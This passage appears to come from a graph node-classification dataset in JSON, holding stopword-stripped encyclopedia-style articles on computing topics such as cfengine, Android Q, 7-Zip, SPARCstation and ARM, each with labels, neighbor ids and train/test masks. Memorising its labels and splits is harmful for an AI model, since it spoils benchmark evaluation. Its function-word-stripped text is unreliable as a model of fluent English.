configuration carried convergent manner means change operation made agent character fixed point rather describing steps needed make change cfengine language describes final state one wants end agent ensures necessary steps taken end policy compliant state thus cfengine run whatever initial state system end predictable result cfengine supports item statistical compliance policy meaning system never guarantee exactly ideal desired state rather one approaches converges towards desired state best-effort rate determined ratio frequency environmental change rate cfengine execution cfengine used large small companies well many universities governmental institutions sites large 40,000 machines reported linkedin sites several thousand hosts running cfengine common according statistics cfengine probably several million computers run cfengine around world users 100 countries registered",
    "neighbors": [
      4802,
      5255,
      5612,
      10222,
      7983,
      7124,
      5397,
      2966,
      823,
      1304,
      1083,
      8892,
      8671
    ],
    "mask": "None"
  },
  {
    "node_id": 9949,
    "label": 2,
    "text": "Android_Q:android q android q upcoming tenth major release 17th version android mobile operating system currently public beta final release android q scheduled release q3 2019 google released first beta android q march 13 2019 exclusively pixel phones including first generation pixel pixel xl devices support extended due popular demand total six beta release-candidate versions released final release currently scheduled third quarter 2019 beta program expanded release beta 3 may 7 2019 beta available 14 partner devices 11 oems twice many devices compared android pie beta beta access removed huawei mate 20 pro may 21 2019 due u.s. government sanctions later reverted given access back may 31 google released beta 4 june 5 2019 finalized android q apis sdk api level 29 dynamic system updates dsu also included beta 4 dynamic system update allows android q devices temporarily install gsi generic system image try newer version android top current android version users decide end testing chosen gsi image simply reboot device boot back normal device android version google released beta 5 july 10 2019 final api 29 sdk well latest optimizations bug fixes google released beta 6 final release candidate testing august 7 2019 android q introduces revamped full-screen gesture system gestures swiping either side edge display go back swiping go home screen swiping holding access overview swiping diagonally bottom corner screen activate google assistant swiping along gesture bar bottom screen switch apps support gestures mandatory oems free add gestures alongside core gestures legacy three-key navigation style remains supported use edge swiping gesture back command noted potentially causing conflicts apps utilize sidebar menus functions accessible swiping api used apps opt handling back gesture within specific areas screen sensitivity control added adjusting size target area activate gesture google later stated drawer widget would support peeked long-pressing near edge screen swiped open feature known bubbles used present content supported apps pop-up overlays similarly overlay-based chat heads feature facebook messenger apps spawn bubbles via notifications example use cases feature include chat messaging apps reminders ongoing tasks updates bubbles designed replace existing overlay permission deprecated due security due use clickjacking malware performance concerns go edition forbids use overlay permissions entirely sideloaded apps automatically lose overlay permission 30 seconds apps play store lose overlay permission time device rebooted android q includes system-level dark theme third-party apps automatically engage dark theme mode active platform optimizations made foldable smartphones including app continuity changing modes changes multi-window mode allow apps run simultaneously rather actively-used app running others considered paused additional support multiple displays direct share succeeded sharing shortcuts allows apps return lists direct targets sharing combination app specific contact use within share menus unlike direct share apps publish targets advance polled runtime improving performance several major security privacy changes present q apps restricted users access location data actively used foreground also new restrictions launching activities background apps major change storage access permissions known scoped storage supported q become mandatory apps beginning next major android release 2020 apps allowed access files external storage created preferably contained within app-specific directory audio image video files contained within music pictures videos directories file may accessed via user intervention storage access framework apps must new read privileged phone state permission order read non-resettable device identifiers imei number",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      10303,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      6367,
      1255,
      236,
      8940,
      9970,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      4995,
      7044,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      9115,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      2001,
      479,
      10207,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 9950,
    "label": 4,
    "text": "Honeynet_Project:honeynet project honeynet project international security research organization dedicated investigating latest attacks developing open source security tools improve internet security learning hackers behave honeynet project began 1999 small mailing list group people time group expanded officially dubbed honeynet project june 2000 project includes dozens active chapters around world including brazil indonesia greece india mexico iran australia ireland many united states honeynet project focuses three primary goals honeynet project volunteers collaborate security research efforts covering data analysis approaches unique security tool development gathering data attackers malicious software use project research provides critical additional information motives attacking communicate attack systems actions compromising system information provided know enemy whitepapers project blog posts scan month forensic challenges project uses normal computers without known vulnerabilities monitors network attacks",
    "neighbors": [
      1315,
      9319,
      9256,
      7798,
      4956
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9951,
    "label": 3,
    "text": "Ishido:_The_Way_of_Stones:ishido way stones ishido way stones puzzle video game released 1990 accolade developed publishing international designed michael feinberg programmed ian gilman michael sandige game producer brad fregger brodie lockard designer shanghai computer game contributed graphics ishido puzzle board game consisting set 72 stones game board 96 squares every stone two attributes color symbol six colors six symbols stone set thus creating 36 unique stones since stone comes pair therefore 72 stones stone set primary objective ishido place 72 stones onto board 96 squares challenge arises stones must placed adjacent others match either color symbol board begins fill objective easily accomplished valuable move 4-way stone placed midst four others two matched color two matched symbol ishido comes 6 differently themed stone sets 5 different game boards variety oriental chimes sound effects ishido originally released macintosh 1990 ports ms-dos amiga game boy sega genesis year atari lynx famicom disk system versions published 1991 microsoft entertainment pack contained adaptation ishido called stones genesis port game involved copyright trial sega v. accolade actual physical board game version ishido published japan ascii 1992 compute called macintosh version ishido addictive ... peaceful encounter oriental flavor new york times wrote one deceptively simple games like go gradually reveal subtleties ... engrossing computer gaming world called game remarkably complex entertainment resource pleasant surprises magazine liked ishido vga graphics concluded would please novice experienced strategy game players atari lynx version game reviewed 1992 dragon 181 hartley patricia kirk lesser role computers column reviewers gave game 5 5 stars entertainment weekly gave game b+ ishido rated 'five mice macuser entered macuser game hall fame also pc magazine best strategy game year award 1990 reviewing ishido re-release 1995 macuser gave 4 5 mice integrated ishido oracle way ask questions ancient chinese book changes ching first user poses question meditate upon playing game attain 4-way match ishido utilizing algorithm authentic yarrow stalk method consulting oracle obtains answer original translation ching used wilhelm/baynes anthony translations primary sources written game michael feinberg original ishido game published publishing international limited edition hand-made walnut slip box following year 1990 accolade published first mass-market version ishido came 20-page booklet legend ishido began story fictional written michael feinberg nevertheless many believed ishido actually ancient game recently re-discovered",
    "neighbors": [
      5762,
      8484,
      9166,
      4856,
      4152,
      9627,
      95
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9952,
    "label": 3,
    "text": "Macintosh_Quadra_950:macintosh quadra 950 macintosh quadra 950 also sold additional software workgroup server 95 personal computer designed manufactured sold apple computer inc. march 1992 october 1995 replaced quadra 900 introduced several months earlier increasing cpu clock rate 68040 cpu improving graphics support two computers otherwise identical including price macintosh processor upgrade card installed computer known power macintosh 950 1993 950 overtaken performance less expensive quadra 800 840av newer quadras addition interleaved ram well enhanced video system scsi bus however compact mini-tower case offered less expansion capability 950 due mid-tower case allowing 6 slots supported kept continued production server market outliving 800 840av 950 discontinued apple n't offer another 6-slot macintosh power macintosh 9600 1997 quadra 950 replaced powerpc-based power macintosh 9500 may 1995 sales continuing october last macintosh quadra sold apple one last 68k models discontinued due high ram capacity large number nubus slots workgroup server 95 succeeded workgroup server 9150 logic board five nubus slots processor direct slot due positioning pds possible use one nubus slots pds card installed nubus-90 standard partially supported allowing cards run 20 mhz two slots provide 25 watts power instead usual 15 watts logic board 1 mb on-board video ram 4 simm slots allow upgrading 2 mb 950 includes key limit access various subsystems depending computer use environment key switch three positions labelled secure position immediately cuts power prevented computer powered position allows computer operate normally secure position intended use server – power always applied position computer lost power immediately starts power restored also position disables keyboard mouse floppy disk drive workgroup server 95 models include workgroup server pds card provides three capabilities two scsi controllers two internal scsi connectors plus one external connector dms scsi control chip reduces i/o load main cpu 128 kb sram used l2 cache three additional slots provide ability expand l2 cache 512 kb quadra 950 announced march 18 dealers receiving machines around may 18 introduced may 18 1992 introduced march 22 1993",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      3167,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      3241,
      6314,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      6884,
      6377,
      1772,
      1776,
      10481,
      11011,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 9953,
    "label": 6,
    "text": "7-Zip:7-zip 7-zip free open-source file archiver utility used place groups files within compressed containers known archives developed igor pavlov first released 1999 7-zip uses 7z archive format read write several archive formats program used command-line interface command p7zip graphical user interface also features shell integration 7-zip source code gnu lgpl license unrar code however gnu lgpl unrar restriction states developers permitted use code reverse-engineer rar compression algorithm default 7-zip creates 7z-format archives codice_1 file extension archive contain multiple directories files container format security size reduction achieved using stacked combination filters consist pre-processors compression algorithms encryption filters core 7z compression uses variety algorithms common bzip2 ppmd lzma2 lzma developed pavlov lzma relatively new system making debut part 7z format lzma uses lz-based sliding dictionary 4 gb size backed range coder native 7z file format open modular file names stored unicode 2011 toptenreviews found 7z compression least 17 better zip 7-zip site since 2002 reported compression ratio results dependent upon data used tests usually 7-zip compresses 7z format 30–70 better zip format 7-zip compresses zip format 2–10 better zip-compatible programs 7z file format specification distributed program source code doc subdirectory 7-zip supports number compression non-compression archive formats packing unpacking including zip gzip bzip2 xz tar wim utility also supports unpacking apm arj chm cpio deb flv jar lha/lzh lzma mslz office open xml onepkg rar rpm smzip swf xar z archives cramfs dmg fat hfs iso mbr ntfs squashfs udf vhd disk images 7-zip supports zipx format unpacking support since least version 9.20 released late 2010 7-zip open msi files allowing access meta-files within along main contents microsoft cab lzx compression nsis lzma installer formats opened similarly microsoft executable programs .exes self-extracting archives otherwise contain archived content e.g. setup files may opened archives compressing zip gzip files 7-zip uses deflate encoder may achieve higher compression lower speed common zlib deflate implementation 7-zip deflate encoder implementation available separately part advancecomp suite tools decompression engine rar archives developed using freely available source code unrar program licensing restriction creation rar compressor 7-zip v15.06 later support extraction files rar5 format backup systems use formats supported archiving programs 7-zip e.g. android backups codice_2 format extracted archivers 7-zip 7-zip comes file manager along standard archiver tools file manager toolbar options create archive extract archive test archive detect errors copy move delete files open file properties menu exclusive 7-zip file manager default displays hidden files follow windows explorer policies tabs show name modification time original compressed sizes attributes comments 4dos codice_3 format going one directory root drives removable internal appear going shows list four options 7-zip lzma sdk originally dual-licensed gnu lgpl common public license additional special exception linked binaries december 2 2008 sdk placed igor pavlov public domain two command-line versions provided 7z.exe using external libraries standalone executable 7za.exe containing built-in modules compression/decompression support limited 7z zip gzip bzip2 z tar formats 64-bit version available support large memory maps leading faster compression versions support multi-threading 7za.exe version 7-zip available unix-like operating systems including linux freebsd macos freedos openvms amigaos 4 morphos p7zip project 7-zip supports self-extracting archives including executable installer 7-zip vulnerable arbitrary code execution dll hijacking load run dll named uxtheme.dll folder executable file 7-zip 16.03 release notes say installer sfx modules added protection dll preloading attack versions 7-zip prior 18.05 contain arbitrary code execution vulnerability module extracting files rar archives cve-2018-10115 vulnerability fixed 30 april 2018 snapfiles.com 2012 rated 7-zip 4.5 stars 5 noting interface additional features fairly basic compression ratio outstanding techrepublic 2009 justin james found detailed settings windows file manager integration appreciated called compression-decompression benchmark utility neat though archive dialog settings confound users concluded 7-zip fits nice niche built-in windows capabilities features paid products able handle large variety file formats process 2002 2016 7-zip downloaded 410 million times sourceforge alone software received awards 2007 sourceforge.net granted community choice awards technical design best project 2013 7-zip received tom hardware elite award due superiority speed compression ratio",
    "neighbors": [
      3969,
      4870,
      6022,
      10121,
      1420,
      2193,
      9874,
      1940,
      5397,
      3222,
      8214,
      9880,
      9121,
      546,
      292,
      3366,
      3114,
      10027,
      6062,
      7983,
      2864,
      5682,
      8114,
      950,
      823,
      6713,
      2755,
      11076,
      1352,
      4296,
      2251,
      1101,
      4174,
      8909,
      10317,
      4561,
      722,
      8147,
      10575,
      10839,
      10971,
      11614,
      1631,
      3296,
      5858,
      10851,
      6759,
      5096,
      5225,
      7529,
      4459,
      9320,
      237,
      1646,
      10476,
      10857,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Train"
  },
  {
    "node_id": 9954,
    "label": 4,
    "text": "De-perimeterisation:de-perimeterisation information security de-perimeterisation removal boundary organisation outside world de-perimeterisation protecting organization systems data multiple levels using mixture encryption secure computer protocols secure computer systems data-level authentication rather reliance organization network boundary internet successful implementation de-perimeterised strategy within organization implies perimeter outer security boundary removed metaphorically de-perimeterisation similar historic dismantling city walls allow free flow goods information achieve shift city states nation states creation standing armies city boundaries extended surround multiple cities de-perimeterisation coined jon measham former employee uk ’ royal mail research paper subsequently used jericho forum royal mail founding member claims made removal border include freeing business-to-business transactions reduction cost ability company agile taken furthest extent organisation could operate securely directly internet operating without hardened border frees organizations collaborate utilizing solutions based collaboration oriented architecture framework recently term used context result entropy deliberate activities individuals within organizations usurp perimeters often well-intentioned reasons latest jericho forum paper named collaboration oriented architecture refers trend de-perimeterisation problem problem br traditional electronic boundary corporate ‘ private ’ network internet breaking trend called de-perimeterisation variations term used describe aspects de-perimeterisation",
    "neighbors": [
      9858,
      8998,
      9513,
      3629,
      9113,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 9955,
    "label": 3,
    "text": "SPARCstation:sparcstation sparcstation sparcserver sparccenter product lines series sparc-based computer workstations servers desktop desk side pedestal rack-based form factor configurations developed sold sun microsystems first sparcstation sparcstation 1 also known sun 4/60 introduced 1989 series popular introduced sun-4c architecture variant sun-4 architecture previously introduced sun 4/260 thanks part delay development modern processors motorola sparcstation series successful across entire industry last model bearing sparcstation name sparcstation 20 workstation series replaced sun ultra series 1995 next sun server generation sun enterprise line introduced 1996 desktop deskside sparcstations sparcservers model number essentially identical systems difference systems designated servers usually headless configured without graphics card monitor sold server rather desktop os license example sparcstation 20 sparcserver 20 almost identical motherboard cpu case design hardware specifications desktop sparcstations sparcservers shipped either pizzabox lunchbox enclosures significant departure earlier sun competing systems time sparcstation 1 2 4 5 10 20 pizzabox machines sparcstation slc elc integrated sun monochrome monitor enclosures sparcstation ipc ipx sparcclassic sparcclassic x sparcstation lx lunchbox machines sparcserver models ending 30 70 housed deskside pedestal enclosures respectively 5-slot 12-slot vmebus chassis models ending 90 sparccenter 2000 came rackmount cabinet enclosures sparcserver 1000 design large rack-mountable desktop unit later versions sparcstation series sparcstation 10 20 could configured multiprocessor systems based mbus high-speed bus systems could accept one two single dual central processing units packaged mbus modules launch sparcserver 600mp series sparcstation/server models also assigned sun 4-series model numbers later models received s-prefix model numbers models listed within category approximately chronological order note configurations supported sun microsystems various third-party processor upgrades available sparcstation/server systems instance 80 mhz weitek power μp sparcstation 2 ipx ross hypersparc mbus modules rated clock speeds 200 mhz mentioned models listed sparcstations also available sparcserver configuration vice versa cs6400 developed outside group working cooperatively rather competitively sun microsystems result although sold cray research “ cray superserver 6400 ” components sun oem part numbers machine documented sun system handbook 1996 cray research bought silicon graphics cs6400 development group sold sun released 64-processor sun ultra enterprise 10000 “ starfire ” following year",
    "neighbors": [
      3328,
      9090,
      9731,
      4479,
      1801,
      4235,
      1809,
      4241,
      2710,
      1818,
      8863,
      7072,
      9343,
      8994,
      11426,
      36,
      1316,
      10789,
      11553,
      1707,
      2731,
      5677,
      6187,
      3247,
      11440,
      6322,
      2871,
      4664,
      442,
      4285,
      6464,
      7104,
      6338,
      9665,
      10051,
      10436,
      3911,
      1480,
      8007,
      4172,
      9422,
      2895,
      3919,
      597,
      3285,
      10327,
      10200,
      2269,
      5471,
      4960,
      10595,
      11363,
      7270,
      10982,
      11626,
      7148,
      878,
      7022,
      1776,
      5233,
      5872,
      5619,
      7151,
      8179,
      6006,
      631,
      9333,
      11129,
      5498,
      11636,
      1788,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 9956,
    "label": 0,
    "text": "Co-occurrence_network:co-occurrence network co-occurrence networks generally used provide graphic visualization potential relationships people organizations concepts biological organisms like bacteria entities represented within written material generation visualization co-occurrence networks become practical advent electronically stored text compliant text mining way definition co-occurrence networks collective interconnection terms based paired presence within specified unit text networks generated connecting pairs terms using set criteria defining co-occurrence example terms b may said “ co-occur ” appear particular article another article may contain terms b c. linking b b c creates co-occurrence network three terms rules define co-occurrence within text corpus set according desired criteria example stringent criteria co-occurrence may require pair terms appear sentence co-occurrence networks created given list terms dictionary relation collection texts text corpus co-occurring pairs terms called “ neighbors ” often group “ neighborhoods ” based interconnections individual terms may several neighbors neighborhoods may connect one another least one individual term may remain unconnected individual terms within context text mining symbolically represented text strings real world entity identified term normally several symbolic representations therefore useful consider terms represented one primary symbol several synonymous alternative symbols occurrence individual term established searching known symbolic representations term process augmented nlp natural language processing algorithms interrogate segments text possible alternatives word order spacing hyphenation nlp also used identify sentence structure categorize text strings according grammar example categorizing string text noun based preceding string text known article graphic representation co-occurrence networks allow visualized inferences drawn regarding relationships entities domain represented dictionary terms applied text corpus meaningful visualization normally requires simplifications network example networks may drawn number neighbors connecting term limited criteria limiting neighbors might based absolute number co-occurrences subtle criteria “ probability ” co-occurrence presence intervening descriptive term quantitative aspects underlying structure co-occurrence network might also informative overall number connections entities clustering entities representing sub-domains detecting synonyms etc working applications co-occurrence approach available public internet pubgene example application addresses interests biomedical community presenting networks based co-occurrence genetics related terms appear medline records website namebase example human relationships inferred examining networks constructed co-occurrence personal names newspapers texts ozgur et al. networks information also used facilitate efforts organize focus publicly available information law enforcement intelligence purposes called open source intelligence osint related techniques include co-citation networks well analysis hyperlink content structure internet analysis web sites connected terrorism",
    "neighbors": [
      8440,
      7780,
      7599
    ],
    "mask": "Test"
  },
  {
    "node_id": 9957,
    "label": 3,
    "text": "F-1_Spirit_(series):f-1 spirit series top formula one racing game developed published konami released msx japan europe 1987 game engine similar konami road fighter also features konami custom sound chip called konami scc five-channel chip compliments three-channel psg chip msx computer system words sound custom chip brings five voices three voices psg sound chip system great msx1 graphics go one first rom msx sound feature together 3d spinoff f-1 spirit 3d special f-1 spirit way formula-1 extended racing game konami released msx third-person racing game features many different types cars everything starts stock cars moving rally cars formula 3 main goal finish first place formula 1 king class racing six types races stock race rally f3 race f3000 race endurance race finally f1 races 16 tracks initially player race stock rally f3 races player win races accumulate points allow play new races player finish race first place receive nine points gets eight points finishes second etc player finish 10th later score points 16 different tracks f1 cars player wins races able play tracks f1 car category complete game win 16 f1 tracks grand total 21 tracks first races easiest ones cars slow enemies drive well player classify new tracks difficulty increase f1 cars insanely fast need great agility win f1 tracks even though look impossible control first practice master formula 1 cars win races enough always show skills multi player mode difficulty level set race track selected number laps variable field includes ready made custom made cars player select engine tires suspension avoiding slower cars player come lap crucial race bump cars side boards obstacles damage car every track pit lane labeled letters pit fuel repair car top speed decrease engine damaged make lose time every lap pit stop hold key speed car repairs fuel intake slower though fuel consumption determined rpm meter real cars car consumes fuel accelerate f1 tracks first race unless ace driver win f1 race try memorize curve play race several times know brake accelerate unlicensed sega master system port released zemina year f1 스피리트 similar game chequered flag released arcades 1988 special version original f-1 spirit a1 spirit way formula-1 released pack-in panasonic joy handle game controller chief differences features futuristic vehicles instead racing cars different passwords e.g panasonic see ending demo bugfixes full successor game released 1988 msx2+ spec unlike original game uses scaling-based third-person graphics like pole position like focuses specifically f-1 racing addition free run grand prix modes two player battle mode difficulty level set free run number settings number laps variable cars custom made body color car engine tires suspension brakes gear wings modified released three floppy disks game konami ever developed msx2+ spec game featured special cable allowed two msx2+ computers linked via second joystick port cable sold separately name je700 multiplayer link cable also reverse-engineered enthusiasts use games another thing makes game special uses msx-music fm-pac yamaha ym2413 opll sound chip originally sold separately built various models msx2+ msx turbor computers game konami used particular sound chip konami games enhanced music use konami scc sound chip even games distributed floppy disk often accompanied scc rom cartridge like snatcher sd snatcher original music composed goro kin supposedly pseudonym similar product f-1 sensation released family computer 1993 contains many features though battle mode dropped based around 1992 formula one season released north america world circuit series europe spirit f-1 released game boy 1991 top-viewed racing game like original players compete formula 3 formula 3000 formula 1 25 different tracks around world featured playable according class rise class tracks become longer forcing pit stops racers become faster turns change simple low angle corners require slight trajectory elbow corners require skill turn without losing speed later re-released first volume konami gb collection japan europe although renamed konami racing versions collection 2004 unlicensed remake original f-1 spirit released brain games chiefly 2004 retro remakes competition context developed successor team road fighter remake remake retains much gameplay content original changed physics number sound graphical improvements latter make game resemble titles f-1 grand prix online leaderboards ported windows mac os x linux even arm devices binary versions windows os x provided .deb provided ubuntu debian linux flavors oses general source code game available well",
    "neighbors": [
      10695,
      8232,
      4524,
      3788,
      9006,
      10576,
      5265,
      6449,
      3348,
      11221,
      823,
      7832,
      1340
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9958,
    "label": 4,
    "text": "Organisation-based_access_control:organisation-based access control computer security organization-based access control orbac access control model first presented 2003 current approaches access control rest three entities subject action object control access policy specifies subject permission realize action object orbac allows policy designer define security policy independently implementation chosen method fulfill goal introduction abstract level security policy defined organization thus specification security policy completely parameterized organization possible handle simultaneously several security policies associated different organizations model restricted permissions also includes possibility specify prohibitions obligations three abstract entities roles activities views abstract privileges defined abstract privileges concrete privileges derived orbac context sensitive policy could expressed dynamically furthermore orbac owns concepts hierarchy organization role activity view context separation constraints",
    "neighbors": [
      1792,
      5573,
      8838,
      4912,
      2737,
      210,
      8210,
      10580,
      10968,
      7260,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9959,
    "label": 3,
    "text": "IXP1200:ixp1200 ixp1200 network processor fabricated intel corporation processor originally digital equipment corporation dec project development since late 1996 parts dec digital semiconductor business acquired intel 1998 part out-of-court settlement end lawsuits company launched patent infringement processor transferred intel dec design team retained design completed intel samples processor available intel partners since 1999 general sample availability late 1999 processor introduced early 2000 166 200 mhz 232 mhz version introduced later processor later succeeded ixp2000 xscale-based family developed entirely intel processor intended replace general-purpose embedded microprocessors specialized application-specific integrated circuit asic combinations used network routers.the ixp1200 designed mid-range high-end routers high-end models processor could combined others increase capability performance router ixp1200 integrates strongarm sa-1100-derived core six microengines risc microprocessors instruction set optimized network packet workloads strongarm core performed non-real-time functions microengines manipulated network packets processor also integrates static random access memory sram synchronous dynamic random access memory sdram controllers pci interface ix bus interface ixp1200 contains 6.5 million transistors measures 126 mm fabricated 0.28 µm complementary metal–oxide–semiconductor cmos process three levels interconnect packaged 432-ball enhanced ball grid array ebga ixp1200 fabricated dec former hudson massachusetts plant",
    "neighbors": [
      704,
      6730,
      7755,
      4622,
      8625,
      499,
      1972,
      10548,
      8795,
      6971,
      1085,
      3294,
      6911
    ],
    "mask": "Test"
  },
  {
    "node_id": 9960,
    "label": 9,
    "text": "NewtonScript:newtonscript newtonscript prototype-based programming language created write programs newton platform heavily influenced self programming language modified suited needs mobile embedded devices august 3 1993 apple unveiled apple newton messagepad device 640 kb ram 4 mb rom running 20 mhz acorn risc machine main intention behind newton project develop device capable replacing computer portable limited battery memory developers looking programming language capable meeting challenges developers looked c++ language realized lacked flexibility started focusing prototype based languages impressed smalltalk self concurrently apple developing another dynamic programming language called dylan strong candidate newton platform however self dylan dropped consideration nascent stage proper integration instead team headed walter r smith developed new language called newtonscript influenced dynamic language like smalltalk prototype model based like self although newtonscript heavily influenced self differences languages differences arose due three perceived problems self syntax also modified allow text-based programming style opposed self widespread use gui environment programming allowed newton programs developed computer running toolkit programs would compiled downloaded newton device running one advantages newtonscript prototype based inheritance reduced memory usage key consideration 128 kb newton prototype gui object could actually stored rom need copy default data functions working memory unlike class based languages creation object involves memory allocated attributes newtonscripts use prototype inheritance allowed allocated memory fields like _proto _parent instead creating whole new object _proto _parent signifies whether object using prototype parent inheritance example illustrate concept developer might create new button instance button uses default font accessing font slot i.e. property member variable return value actually stored rom button instance ram value font slot prototype inheritance chain followed value found developer changes button font setting font slot new value override prototype override value stored ram newtonscript differential inheritance therefore made efficient use newton expensive flash ram storing bulk default data code pda cheaper much larger rom views objects created newton view system created run-time render views template blueprint views created protos blueprint template view elements newtonscript code libraries frame slot frame dynamic collection slots one element fram called slot slot made name value value type worthwhile note objects newtonscript frames soup entry related collection frames/ data entry individual frame soup frame heap ram allocated dynamically newtonscript base view main view application consisting variables methods used application advantages disadvantages cancellation newton project apple 1998 mainstream developments newtonscript stopped however features used newtonscript would continue inspire programming models languages prototype-based object model self newtonscript used javascript popular visible language use concept far newtonscript also one conceptual ancestors together smalltalk self act1 lisp lua general-purpose programming language called io implements differential inheritance model used newtonscript conserve memory",
    "neighbors": [
      2304,
      9345,
      1954,
      3462,
      6502,
      8262,
      4777,
      3051,
      2383,
      10198,
      1591
    ],
    "mask": "None"
  },
  {
    "node_id": 9961,
    "label": 7,
    "text": "Princh:princh princh danish software company founded 2014 developing cloud printing solutions company headquartered city aarhus denmark based idea sharing economy princh building global network printers via smartphone web app users locate printer nearby get directions go print pay print job solution available native mobile apps android ios well web desktop solutions businesses libraries app connects network printer owners users around world princh supports types printable files company founded 2014 first months headquarters located navitas building harbor aarhus early 2015 company signed investment deal private investor allowing princh move bigger offices expand team company currently based southern part aarhus princh printing service officially launched june 23 2015 present princh solution consists printers multitude locations print shops libraries hotels universities conference centers princh popular printing solution among libraries found denmark sweden germany norway princh app users able locate nearest printer denmark currently around 500 printing locations user printer user chooses document printed opens ios shares android princh point document uploaded princh cloud user selects desired nearby printer entering printer id number scanning qr-code located top printer pays credit card preferred payment option print job carried printer owners get access personal control panel set print prices monitor princh activity business installing princh free printer owners princh gets small fee per print job",
    "neighbors": [
      662
    ],
    "mask": "Test"
  },
  {
    "node_id": 9962,
    "label": 7,
    "text": "Distributed_object_middleware:distributed object middleware distributed object middleware dom type infrastructure allows remote access remote objects transparently based remote procedure call rpc mechanism dom systems also enable objects different platforms interact example corba examples dom systems include microsoft distributed component object model dcom enterprise javabeans ejb sun microsystems oracle corporation",
    "neighbors": [
      9441,
      9665,
      10024,
      7067,
      3517
    ],
    "mask": "Test"
  },
  {
    "node_id": 9963,
    "label": 4,
    "text": "AEGIS_SecureConnect:aegis secureconnect aegis secureconnect simply 'aegis former name network authentication system used ieee 802.1x networks developed meetinghouse data communications inc. system renamed cisco secure services client meetinghouse acquired cisco systems aegis protocol 802.1x supplicant i.e handles authentication wired wireless networks use wpa-psk wpa-radius certificate-based authentication commonly installed along network interface card nic vpn drivers",
    "neighbors": [
      6904,
      6834,
      4435,
      10332
    ],
    "mask": "None"
  },
  {
    "node_id": 9964,
    "label": 3,
    "text": "ARM_architecture:arm architecture arm previously advanced risc machine originally acorn risc machine family reduced instruction set computing risc architectures computer processors configured various environments arm holdings develops architecture licenses companies design products implement one architecturesincluding systems-on-chips soc systems-on-modules som incorporate memory interfaces radios etc also designs cores implement instruction set licenses designs number companies incorporate core designs products processors risc architecture typically require fewer transistors complex instruction set computing cisc architecture x86 processors found personal computers improves cost power consumption heat dissipation characteristics desirable light portable battery-powered devicesincluding smartphones laptops tablet computers embedded systems supercomputers consume large amounts electricity arm could also power-efficient solution arm holdings periodically releases updates architecture architecture versions armv3 armv7 support 32-bit address space pre-armv3 chips made arm holdings formed used acorn archimedes 26-bit address space 32-bit arithmetic architectures 32-bit fixed-length instructions thumb version supports variable-length instruction set provides 32- 16-bit instructions improved code density older cores also provide hardware execution java bytecodes newer ones one instruction javascript released 2011 armv8-a architecture added support 64-bit address space 64-bit arithmetic new 32-bit fixed-length instruction set 100 billion arm processors produced arm widely used instruction set architecture instruction set architecture produced largest quantity currently widely used cortex cores older classic cores specialized securcore cores variants available include exclude optional capabilities british computer manufacturer acorn computers first developed acorn risc machine architecture arm 1980s use personal computers first arm-based products coprocessor modules bbc micro series computers successful bbc micro computer acorn computers considered move relatively simple mos technology 6502 processor address business markets like one soon dominated ibm pc launched 1981 acorn business computer abc plan required number second processors made work bbc micro platform processors motorola 68000 national semiconductor 32016 considered unsuitable 6502 powerful enough graphics-based user interface according sophie wilson processors tested time performed 4 mbit/second bandwidth testing available processors finding lacking acorn decided needed new architecture inspired papers berkeley risc project acorn considered designing processor visit western design center phoenix 6502 updated effectively single-person company showed acorn engineers steve furber sophie wilson need massive resources state-of-the-art research development facilities wilson developed instruction set writing simulation processor bbc basic ran bbc micro 6502 second processor convinced acorn engineers right track wilson approached acorn ceo hermann hauser requested resources hauser gave approval assembled small team implement wilson model hardware official acorn risc machine project started october 1983 chose vlsi technology silicon partner source roms custom chips acorn wilson furber led design implemented similar efficiency ethos 6502 key design goal achieving low-latency input/output interrupt handling like 6502 6502 memory access architecture let developers produce fast machines without costly direct memory access dma hardware first samples arm silicon worked properly first received tested 26 april 1985 first arm application second processor bbc micro helped developing simulation software finish development support chips vidc ioc memc sped cad software used arm2 development wilson subsequently rewrote bbc basic arm assembly language in-depth knowledge gained designing instruction set enabled code dense making arm bbc basic extremely good test arm emulator original aim principally arm-based computer achieved 1987 release acorn archimedes 1992 acorn queen award technology arm arm2 featured 32-bit data bus 26-bit address space 27 32-bit registers eight bits program counter register available purposes top six bits available 26-bit address space served status flags bottom two bits available program counter always word-aligned used setting modes address bus extended 32 bits arm6 program code still lie within first 64 mb memory 26-bit compatibility mode due reserved bits status flags arm2 transistor count 30,000 compared motorola six-year-older 68000 model around 40,000 much simplicity came lack microcode represents one-quarter one-third 68000 